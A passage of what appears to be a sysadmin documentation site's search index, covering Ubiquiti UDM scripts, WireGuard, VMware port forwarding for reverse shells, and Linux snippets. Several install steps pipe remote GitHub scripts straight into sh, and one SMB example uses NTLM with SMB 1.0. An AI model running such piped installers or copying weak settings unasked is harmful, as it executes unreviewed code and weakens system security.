", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/#features", "title": "Features", "text": " Allows you to run a shell script at S95 anytime your UDM starts / reboots Persists through reboot and firmware updates! It is able to do this because Ubiquiti caches all debian package installs on the UDM in /data, then re-installs them on reset of unifi-os container. ", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/#install", "title": "Install", "text": "You can execute in UDM/Pro/SE and UDR with:
curl -fsL \"https://raw.githubusercontent.com/unifi-utilities/unifios-utilities/HEAD/on-boot-script/remote_install.sh\" | /bin/sh\n
This is a force to install script so will uninstall any previous version and install on_boot keeping your on boot files.
This will also install CNI Plugins & CNI Bridge scripts. If you are using UDMSE/UDR remember that you must install podman manually because there is no podman.
For manual installation see: The Github Readme
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/", "title": "UDM Persistent SSH Keys", "text": "UDM will discard any Authorized Keys for SSH every reboot or firmware upgrade. This script will allow you to persist your SSH keys in the UDM and survive reboots.
Github Repository: UDM Persistent SSH Keys
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#changelog", "title": "Changelog", "text": " 2023-02-22 - Fixed support for UDM Pro Firmware 1.x and 2.x and 3.x - Must reinstall the script after upgrade from 1.x to 2.x ", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#persistence-on-reboot", "title": "Persistence on Reboot", "text": "This script need to run every time the system is rebooted since the /root/.ssh/authorized_keys overwrites every boot. This can be accomplished with a boot script. Flow this guide: UDM / UDMPro Boot Script
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#compatibility", "title": "Compatibility", "text": " Tested on UDM PRO UDM Pro doesn't support ed25519 SSH Keys ", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#installation", "title": "Installation", "text": "The script was tested on UDM PRO
(!) Depending on firmware your $DATA_DIR
will be /mnt/data
(Firmware 1.x) or /data
(Firmware 2.x and 3.x)
curl -s https://raw.githubusercontent.com/fire1ce/UDM-Persistent-SSH-Keys/main/install.sh | sh\n
Add you public RSA keys to:
$DATA_DIR/ssh/authorized_keys\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#uninstall", "title": "Uninstall", "text": "Delete the 99-ssh-keys.sh file
rm -rf $DATA_DIR/on_boot.d/99-ssh-keys.sh\n
Delete your authorized_keys file
rm -rf $DATA_DIR/ssh/authorized_keys\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#usage", "title": "Usage", "text": "At boot the script with read the $DATA_DIR/ssh/authorized_keys file and add the content to UDM's /root/.ssh/authorized_keys
Manual run:
$DATA_DIR/on_boot.d/99-ssh-keys.sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/", "title": "UDM Better Fan Speeds", "text": "Github Repository: UDM Better Fan Speeds
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#repository-deprecation-notice", "title": "Repository Deprecation Notice", "text": " Repository Deprecation Notice: This project is now deprecated and archived due to the release of UniFi's firmware v2.x and v3.x for Dream Machnines, which natively fix the fan speed issues.
This repository only works with firmware 1.x. UDM-PRO Please consider upgrading your firmware for improved functionality.
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#what-it-does", "title": "What It Does", "text": "It stops the build in service that monitors the thermal values, fan speed and connection of a HDD/SSD. After that it sets the thermal/fan chip (adt7475) to automatic mode. Once that is done it changes the thermal and fan threshold values specified in the script. If you like, you can change the values to your own preferences.
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#compatibility", "title": "Compatibility", "text": "", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#warning", "title": "WARNING", "text": "USE THIS ON YOUR OWN RISK. If you apply inappropriate settings with this script, you will possibly (soft- or hard-) brick your equipment.
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#requirements", "title": "Requirements", "text": "Persistence on Reboot is required. This can be accomplished with a boot script. Flow this guide: UDM Boot Script
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#installation", "title": "Installation", "text": "curl -s https://raw.githubusercontent.com/fire1ce/UDM-Better-Fan-Speeds/main/install.sh | sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#configuration", "title": "Configuration", "text": "You can edit the fan-speed settings at
/mnt/data/on_boot.d/11-udm-better-fan-speed.sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#credit", "title": "Credit", "text": "Based on renedis/ubnt-auto-fan-speed by ReneDIS. Thanks
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/", "title": "UDM Cloudflare DDNS", "text": "Github Repository: UDM Cloudflare DDNS
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#change-log", "title": "Change Log", "text": " 2022-22-2 - Major Update for UDM v2.x and v3.x ", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#what-it-does", "title": "What It Does", "text": "This will allow to to span a container with podman
to handle DDNS updates for main internet IP address. The container will run the background without any system permissions.
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#compatibility", "title": "Compatibility", "text": "", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#requirements", "title": "Requirements", "text": "Persistence on Reboot is required. This can be accomplished with a boot script. Flow this guide: UDM Boot Script
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#creating-a-cloudflare-api-token", "title": "Creating a Cloudflare API token", "text": "To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard. Use the generated token at the API_KEY
variable for the container ", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#installation", "title": "Installation", "text": "curl -s https://raw.githubusercontent.com/fire1ce/UDM-Cloudflare-DDNS/main/install.sh | sh\n
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#configuration", "title": "Configuration", "text": "will be updated soon
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/", "title": "Wireguard VPN", "text": "WireGuard\u00ae is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPsec, while avoiding the massive headache. It intends to be considerably more performant than OpenVPN. WireGuard is designed as a general purpose VPN for running on embedded interfaces and super computers alike, fit for many different circumstances. Initially released for the Linux kernel, it is now cross-platform (Windows, macOS, BSD, iOS, Android) and widely deployable. It is currently under heavy development, but already it might be regarded as the most secure, easiest to use, and simplest VPN solution in the industry.
Github Repository: wireguard-vyatta-ubnt
A guide on installing and using the WireGuard kernel module and tools on Ubiquiti UnifiOS routers (UDM, UDR, and UXG).
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#installation", "title": "Installation", "text": " Download the latest release for UnifiOS. Use the correct link in the command below
curl -Lfo UnifiOS-wireguard.tar.gz https://github.com/WireGuard/wireguard-vyatta-ubnt/releases/download/${RELEASE}/UnifiOS-${RELEASE}.tar.gz\n
Extract the files to your data directory and run the setup script.
For the UDM/P or UXG-Pro, extract the files into /mnt/data/wireguard
tar -C /mnt/data -xvf UnifiOS-wireguard.tar.gz\n/mnt/data/wireguard/setup_wireguard.sh\n
For the UDM-SE or UDR, extract the files into /data/wireguard
tar -C /data -xvf UnifiOS-wireguard.tar.gz\n/data/wireguard/setup_wireguard.sh\n
The setup script will load the wireguard module, and setup the symbolic links for the wireguard tools (wg-quick and wg). You can run dmesg
to verify the kernel module was loaded. You should see something like the following:
[13540.520120] wireguard: WireGuard 1.0.20210219 loaded. See www.wireguard.com for information.\n[13540.520126] wireguard: Copyright (C) 2015-2019 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.\n
Now you should be able to create a wireguard interface. Please see usage below.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#compatibility", "title": "Compatibility", "text": "The wireguard module and tools included in this package have been tested on the following Ubiquiti devices:
Unifi Dream Machine (UDM) and UDM-Pro 0.5.x, 1.9.x, 1.10.x, 1.11.x. UDM-SE and Unifi Dream Router (UDR) 2.2.x UniFi Next-Gen Gateway (UXG-Pro) 1.11.x Note that for the UDM, UDM Pro, and UXG-Pro, Ubiquiti includes the wireguard module in the official kernel since firmware 1.11.0-14, but doesn't include the WireGuard tools. The setup script in this package will try to load the built-in wireguard module if it exists first.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#upgrade", "title": "Upgrade", "text": " Unload the wireguard module.
rmmod wireguard\n
Re-install wireguard by following the Installation instructions above to get the latest version.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#uninstallation", "title": "Uninstallation", "text": " Delete the wireguard files from your data directory.
rm -rf /mnt/data/wireguard\n
Delete the wireguard tools and any boot scripts.
rm /usr/bin/wg /usr/bin/wg-quick\n
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#usage", "title": "Usage", "text": "Read the documentation on WireGuard.com for general WireGuard concepts. Here is a simple example of a wireguard server configuration for UnifiOS.
Create the server and client public/private key pairs by running the following. This will create the files privatekey_server
, publickey_server
and privatekey_client1
, publickey_client1
. These contain the public and private keys. Store these files somewhere safe.
wg genkey | tee privatekey_server | wg pubkey > publickey_server\nwg genkey | tee privatekey_client1 | wg pubkey > publickey_client1\n
On your UDM/UDR, create a wireguard config under /etc/wireguard
named wg0.conf
. Here is an example server config. Remember to use the correct server private key and the client public key.
[Interface]\nAddress = 10.0.2.1/24\nPrivateKey = <server's privatekey>\nListenPort = 51820\n\n[Peer]\nPublicKey = <client's publickey>\nAllowedIPs = 10.0.2.2/32\n
For your client, you will need a client config like the following example. Remember to use the correct client private key and the server public key.
[Interface]\nAddress = 10.0.2.2/32\nPrivateKey = <client's privatekey>\n\n[Peer]\nPublicKey = <server's publickey>\nEndpoint = <server's ip>:51820\nAllowedIPs = 10.0.2.0/24\n
Adjust Address to change the IP of the client. Adjust AllowedIPs to set what your client should route through the tunnel. Set to 0.0.0.0/0,::/0
to route all the client's Internet through the tunnel. See the WireGuard documentation for more information. Note each different client requires their own private/public key pair, and the public key must be added to the server's WireGuard config as a separate Peer. To bring the tunnel up, run wg-quick up <config>
. Verify the tunnel received a handshake by running wg
. wg-quick up /etc/wireguard/wg0.conf\n
To bring down the tunnel, run wg-quick down <config>
. wg-quick down /etc/wireguard/wg0.conf\n
In your UniFi Network settings, add a WAN_LOCAL (or Internet Local) firewall rule to ACCEPT traffic destined to UDP port 51820 (or your ListenPort if different). Opening this port in the firewall is needed so remote clients can access the WireGuard server. ", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#routing", "title": "Routing", "text": "The AllowedIPs parameter in the wireguard config allows you to specify which destination subnets to route through the tunnel.
If you want to route router-connected clients through the wireguard tunnel based on source subnet or source VLAN, you need to set up policy-based routing. Currently, there is no GUI support for policy-based routing in UnifiOS, but it can be set up in SSH by using ip route
to create a custom routing table, and ip rule
to select which clients to route through the custom table.
For a script that makes it easy to set-up policy-based routing rules on UnifiOS, see the split-vpn project.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#binaries", "title": "Binaries", "text": "Prebuilt binaries are available under releases.
The binaries are statically linked against musl libc to mitigate potential issues with UnifiOS' glibc.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#persistence-on-reboot", "title": "Persistence on Reboot", "text": "The setup script must be run every time the system is rebooted to link the wireguard tools and load the module. This can be accomplished with a boot script.
For the UDM or UDM Pro, install UDM Utilities on-boot-script by following the instructions here, then create a boot script under /mnt/data/on_boot.d/99-setup-wireguard.sh
and fill it with the following contents. Remember to run chmod +x /mnt/data/on_boot.d/99-setup-wireguard.sh
afterwards.
Click here to see the boot script.
#!/bin/sh\n/mnt/data/wireguard/setup_wireguard.sh\n
For the UDM-SE or UDR, create a systemd boot service to run the setup script at boot. Create a service file under /etc/systemd/system/setup-wireguard.service
and fill it with the following contents. After creating the service, run systemctl daemon-reload && systemctl enable setup-wireguard
to enable the service on boot. Click here to see the boot service.
[Unit]\nDescription=Run wireguard setup script\nWants=network.target\nAfter=network.target\n\n[Service]\nType=oneshot\nExecStart=sh -c 'WGDIR=\"$(find /mnt/data/wireguard /data/wireguard -maxdepth 1 -type d -name \"wireguard\" 2>/dev/null | head -n1)\"; \"$WGDIR/setup_wireguard.sh\"'\n\n[Install]\nWantedBy=multi-user.target\n
Note this only adds the setup script to start at boot. If you also want to bring your wireguard interface up at boot, you will need to add another boot script with your wg-quick up
command.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#troubleshooting", "title": "Troubleshooting", "text": "Setup script returns error \"Unsupported Kernel version XXX\" * The wireguard package does not contain a wireguard module built for your firmware or kernel version, nor is there a built-in module in your kernel. Please open an issue and report your version so we can try to update the module. wg-quick up returns error \"unable to initialize table 'raw'\" * Your kernel does not have the iptables raw module. The raw module is only required if you use `0.0.0.0/0` or `::/0` in your wireguard config's AllowedIPs. A workaround is to instead set AllowedIPs to `0.0.0.0/1,128.0.0.0/1` for IPv4 or `::/1,8000::/1` for IPv6. These subnets cover the same range but do not invoke wg-quick's use of the iptables raw module.", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#credits", "title": "Credits", "text": "Original work to compile WireGuard on UnifiOS by @tusc (wireguard-kmod).
\"WireGuard\" and the \"WireGuard\" logo are registered trademarks of Jason A. Donenfeld.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#the-built-in-gateway-dns-does-not-reply-to-requests-from-the-wireguard-tunnel", "title": "The built-in gateway DNS does not reply to requests from the WireGuard tunnel", "text": " The built-in dnsmasq on UnifiOS is configured to only listen for requests from specific interfaces. The wireguard interface name (e.g.: wg0) needs to be added to the dnsmasq config so it can respond to requests from the tunnel. You can run the following to add wg0 to the dnsmasq interface list: echo \"interface=wg0\" > /run/dnsmasq.conf.d/custom_listen.conf\nkillall -9 dnsmasq\n
You can also those commands to PostUp in your wireguard config's Interface section to automatically run them when the tunnel comes up, e.g.: PostUp = echo \"interface=%i\" > /run/dnsmasq.conf.d/custom_listen.conf; killall -9 dnsmasq\n PreDown = rm -f /run/dnsmasq.conf.d/custom_listen.conf; killall -9 dnsmasq\n
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/vmware/vmware-fusion/", "title": "VMware Fusion", "text": "", "tags": ["vmware", "vmware-fusion"]}, {"location": "infrastructure/vmware/vmware-fusion/#port-forwarding-for-reverse-shells", "title": "Port Forwarding for Reverse Shells", "text": "If you use your vm as NAT network \"Shared with My Mac\" You can forward a port to your host macOS machine.
The network configuration files are stored their respective folders within the VMware Fusion preferences folder.
/Library/Preferences/VMware\\ Fusion/\n
In order to find the right network config you can inspect the dhcpd.conf inside of vmnet* folders.
cat dhcpd.conf\n
After you found the correct network it should contain a nat.conf file Edit the (with sudo privileges) nat.conf, For UDP protocol edit the section [incomingudp] for TCP protocol edit the [incomingtcp]
In the next example we will forward port 4444 from VM to the 4444 port on the host. You can foreword any port to any port as you like.
After you saved the configuration nat.conf file you must restart VMware's network services
You do NOT need to restart the Virtual Machine
sudo /Applications/VMware\\ Fusion.app/Contents/Library/vmnet-cli --stop\nsudo /Applications/VMware\\ Fusion.app/Contents/Library/vmnet-cli --start\n
If you want to test the port forwarding is working as it should here's an example of running simple python webserver on the vm on port 4444 we configured before:
python -m SimpleHTTPServer 4444\n
Now you can test it on the Host machine by browsing to http://localhost:4444
or http://127.0.0.1:4444
", "tags": ["vmware", "vmware-fusion"]}, {"location": "linux/files-handling/", "title": "Files Handling", "text": "", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#ncurses-disk-usage", "title": "NCurses Disk Usage", "text": "Ncdu is a disk usage analyzer with an ncurses interface.
apt-get install ncdu\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#delete-large-file-list-argument-list-too-long", "title": "Delete Large File List - Argument list too long", "text": "find . -name '*'|xargs rm\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#change-permissions-chmod-to-folders-and-files", "title": "Change permissions (chmod) to folders and files", "text": "find . -type d -exec chmod 755 {} +\nfind . -type f -exec chmod 644 {} +\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#recursively-chown-user-and-group", "title": "Recursively chown user and group", "text": "chown -R user:group /some/path/here\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#recursively-chmod-to-775664", "title": "Recursively chmod to 775/664", "text": "chmod -R a=,a+rX,u+w,g+w /some/path/here\n
^ ^ ^ ^ adds write to group\n | | | adds write to user\n | | adds read to all and execute to all folders (which controls access)\n| sets all to `000`\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#find-uidgid-for-user", "title": "Find UID/GID for user", "text": "id <username>\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/general-snippets/", "title": "General Snippets", "text": "", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#disable-ssh-login-welcome-message", "title": "Disable SSH Login Welcome Message", "text": "To disable
touch ~/.hushlogin\n
To re-enable
rm -rf ~/.hushlogin\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#change-sudo-password-requirement-timeout-in-linux", "title": "Change Sudo Password Requirement Timeout In Linux", "text": "To change sudo password timeout limit in Linux, run:
sudo visudo\n
This command will open the\u00a0/etc/sudoers\u00a0file in\u00a0nano\u00a0editor.
Find the following line:
Defaults env_reset\n
Change it like below the 30 is the number of minutes you want to set the timeout to.
Defaults env_reset, timestamp_timeout=30\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#redirect-output-to-a-file-and-stdout-with-tee", "title": "Redirect Output to a File and Stdout With tee", "text": "The command you want is named tee
:
foo | tee output.file\n
For example, if you only care about stdout:
ls -a | tee output.file\n
If you want to include stderr, do:
program [arguments...] 2>&1 | tee outfile\n
2>&1 redirects channel 2 (stderr/standard error) into channel 1 (stdout/standard output), such that both is written as stdout. It is also directed to the given output file as of the tee command.
Furthermore, if you want to append to the log file, use tee -a as:
program [arguments...] 2>&1 | tee -a outfile\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#add-permanent-path-to-application", "title": "Add Permanent Path to Application", "text": "First find the location of the Application/Service:
find / -name ApplicationName\n
Go to the path where the application is located
cd \"../../../ApplicationName\"\n
Run this command for ZSH:
echo 'export PATH=\"'$(pwd)':$PATH\"' >> ~/.zshrc && source ~/.zshrc\n
Run this command for \"shell Profile\":
echo 'export PATH=\"'$(pwd)':$PATH\"' >> ~/.profile && source ~/.profile\n
Run this command for \"shell\":
echo 'export PATH=\"'$(pwd)':$PATH\"' >> ~/.shellrc && source ~/.shellrc\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#create-symbolic-links", "title": "Create Symbolic Links", "text": "To create a symbolic link in Unix/Linux, at the terminal prompt, enter:
ln -s source_file target_file\n
to remove symbolic link use the rm
command on the link
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#open-last-edited-file", "title": "Open Last Edited File", "text": "less `ls -dx1tr /usr/local/cpanel/logs/cpbackup/*|tail -1`\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#kill-process-that-runs-more-than-x-time", "title": "Kill Process That Runs More Than X Time", "text": "Kill cgi after 30 secs:
for i in `ps -eo pid,etime,cmd|grep cgi|awk '$2 > \"00:30\" {print $1}'`; do kill $i; done\n
", "tags": ["linux", "snippets"]}, {"location": "linux/locales-time-zone/", "title": "Locales & Timezone", "text": "", "tags": ["linux", "locales", "timezone"]}, {"location": "linux/locales-time-zone/#fix-locales-fix-bash-local-error", "title": "Fix Locales (Fix Bash Local Error)", "text": "Set the Locale, Find the en_US.UTF-8 in the list and select it, at the following screen select it.
dpkg-reconfigure locales\n
", "tags": ["linux", "locales", "timezone"]}, {"location": "linux/locales-time-zone/#set-system-time-with-time-zone-timedatectl-ntp", "title": "Set System Time With Time Zone (timedatectl ntp)", "text": "Find your time zone with timedatectl list-timezones use grep for easier results:
timedatectl list-timezones | grep \"Toronto\"\n
The output should look like this:
America/Toronto\n
Now set the Time Zone and active it.
timedatectl set-timezone Asia/Jerusalem\ntimedatectl set-ntp true\n
Now test timedatectl status
timedatectl status\n
Check your system time
date\n
", "tags": ["linux", "locales", "timezone"]}, {"location": "linux/lvm-partitions/", "title": "LVM Partitions", "text": "", "tags": ["linux", "lvm"]}, {"location": "linux/lvm-partitions/#removing-lvm-partition-and-merging-in-to-root-partition", "title": "Removing LVM Partition and Merging In To / (root partition)", "text": "Find out the names of the partition with df
df\n
You need to unmount the partition before you can delete them and marge backup the data of the partition you would like to delete this example will use \"centos-home\" as the partition that will be merged to the root partition.
unmount -a\nlvremove /dev/mapper/centos-home\nlvextend -l +100%FREE -r /dev/mapper/centos-root\n
After the merging and before mounting you should remove the partition from fastab
nano /etc/fstab\nmount -a\n
", "tags": ["linux", "lvm"]}, {"location": "linux/memory-swap/", "title": "Memory & Swap", "text": "", "tags": ["linux"]}, {"location": "linux/memory-swap/#who-uses-ram", "title": "Who Uses RAM", "text": "ps aux | awk '{print $6/1024 \" MB\\t\\t\" $11}' | sort -n\n
", "tags": ["linux"]}, {"location": "linux/memory-swap/#who-is-using-swap-memory", "title": "Who Is Using Swap Memory", "text": "grep VmSwap /proc/*/status 2>/dev/null | sort -nk2 | tail -n5\n
", "tags": ["linux"]}, {"location": "linux/memory-swap/#clear-cache-and-swap", "title": "Clear Cache and Swap", "text": "echo 3 > /proc/sys/vm/drop_caches && swapoff -a && swapon -a\n
", "tags": ["linux"]}, {"location": "linux/services-and-daemons/", "title": "Services & Daemons", "text": "In Linux, a service is a program that runs in the background and performs a specific function. A daemon is a type of service that also runs in the background and often starts at boot time. These processes can be controlled using the systemctl or service command. Services and daemons are an important part of the Linux operating system, as they provide various functions and services that allow the system to run smoothly. There are many different types of services and daemons that can be found on a typical Linux system, and you can find more information about them in the documentation for your specific distribution.
"}, {"location": "linux/services-and-daemons/#useful-systemctl-commands", "title": "Useful systemctl
commands", "text": "Start the specified service.
systemctl start <service>\n
Stop the specified service.
systemctl stop <service>\n
Restart the specified service.
systemctl restart <service>\n
Enable the specified service to start automatically at boot time.
systemctl enable <service>\n
Disable the specified service from starting automatically at boot time.
systemctl disable <service>\n
Show the current status and runtime information for the specified service.
systemctl status <service>\n
Show the dependencies for the specified service.
systemctl list-dependencies <service>\n
List all installed unit files on the system.
systemctl list-units --all\n
"}, {"location": "linux/services-and-daemons/#display-running-services", "title": "Display Running Services", "text": "The systemctl command with the grep command will display a list of all running services and daemons on your Linux system. The grep command will search the output of systemctl for the string \"running\" and only display the lines that contain that string.
systemctl | grep running\n
For more readable output:
systemctl --no-pager | grep running | column -t\n
"}, {"location": "linux/services-and-daemons/#display-enabled-services", "title": "Display Enabled Services", "text": "systemctl list-unit-files --state=enabled
is a command that shows a list of unit files that are currently enabled on the system. The --state option specifies the state of the unit files that you want to see. By using --state=enabled, you will see only unit files that are enabled and will be started automatically when the system boots.
systemctl list-unit-files --state=enabled\n
"}, {"location": "linux/smb-mount-autofs/", "title": "SMB Mount With autofs", "text": "Install autofs cifs-utils
apt install -y autofs cifs-utils\n
Eddit auto.cifs file
nano /etc/auto.cifs\n
Add this to the file: (\"media\" - is any name for your mount)
media -fstype=cifs,rw,noperm,vers=3.0,credentials=/etc/.credentials.txt ://oscar.3os.re/active-share/media\n
Create credentials file
nano /etc/.credentials.txt\n
Add you credentials for the smb mount:
username=YourUser\npassword=YourPassword\n
Exit and save:
nano /etc/auto.master\n
At the end of the file add: (\"/mnt\" - mount location, /etc/auto.cifs your config for mounting the SMB Share)
/mnt /etc/auto.cifs --timeout=600 --ghost\n
Save end exit. Test the mounting.
systemctl start autofs\ncd /mnt/media/\nls\n
You should see the mount over there. Enable autofs on boot:
systemctl enable autofs\n
", "tags": ["smb", "share", "autofs", "mount"]}, {"location": "linux/smb-mount-autofs/#smb-mount-on-linux-with-credentials", "title": "SMB Mount on Linux With Credentials", "text": "sudo apt-get install cifs-utils\nnano ~/.smbcredentials\n
add this to the config.
username=msusername\npassword=mspassword\n
Save the file, exit the editor. Change the permissions of the file to prevent unwanted access to your credentials:
chmod 600 ~/.smbcredentials\n
Then edit your /etc/fstab file (with root privileges) to add this line (replacing the insecure line in the example above, if you added it):
//servername/sharename /media/windowsshare cifs vers=1.0,credentials=/home/ubuntuusername/.smbcredentials,iocharset=utf8,sec=ntlm 0 0\n
Save the file, exit the editor.
Finally, test the fstab entry by issuing:
sudo mount -a\n
If there are no errors, you should test how it works after a reboot. Your remote share should mount automatically.
", "tags": ["smb", "share", "autofs", "mount"]}, {"location": "linux/ssh-hardening-with-rsa-keys/", "title": "SSH Hardening with SSH Keys", "text": "", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#generating-a-new-ssh-key", "title": "Generating a new SSH key", "text": "RSA 4096
ssh-keygen -t rsa -b 4096 -C \"your_email@example.com\"\n
Ed25519 Algorithm
ssh-keygen -t ed25519 -C \"your_email@example.com\"\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#automatic-copy-rsa-key-to-the-server", "title": "Automatic Copy RSA Key to The Server", "text": "ssh-copy-id -i ~/.ssh/id_rsa.pub user@host\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#manually-copy-rsa-key-to-the-server", "title": "Manually Copy RSA Key to The Server", "text": "ssh to the host (do not close this connection
)
mkdir -p ~/.ssh && touch .ssh/authorized_keys\n
copy your public key usually located at ~/.ssh/id_rsa.pub
echo PUCLICK_Key_STRING >> ~/.ssh/authorized_keys\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#ssh-hardening-disable-password-login", "title": "SSH Hardening - Disable Password Login", "text": "edit /etc/ssh/sshd_config
change:
#PasswordAuthentication yes\n
to
PasswordAuthentication no\n
save&exit
restart ssh service:
sudo systemctl restart ssh\n
Danger
Open new SSH season and test login with RSA Keys before closing the existing connection
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#optional-change-ssh-port", "title": "Optional: change ssh port", "text": "edit /etc/ssh/sshd_config
change the port to a desired one
port 1337\n
save&exit
restart ssh service:
sudo systemctl restart ssh\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#add-privet-id_rsa-key-to-server", "title": "Add Privet id_rsa key to Server", "text": "copy the id_rsa key to ~/.ssh folder
cd ~/.ssh\nsudo ssh-agent bash\nssh-add id_rsa\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/Network/identify-nics/", "title": "Identify Physical Network Interfaces", "text": "", "tags": ["linux", "network"]}, {"location": "linux/Network/identify-nics/#the-problem", "title": "The Problem", "text": "Servers usually have a number of physical network interfaces. The network interfaces names in linux host usually won't tell you much about the which physical network interface corresponds to the interface name. Therefor, it creates a problem when you want to use a specific network interface for a specific purpose but you don't know which physical network interface corresponds to the interface name.
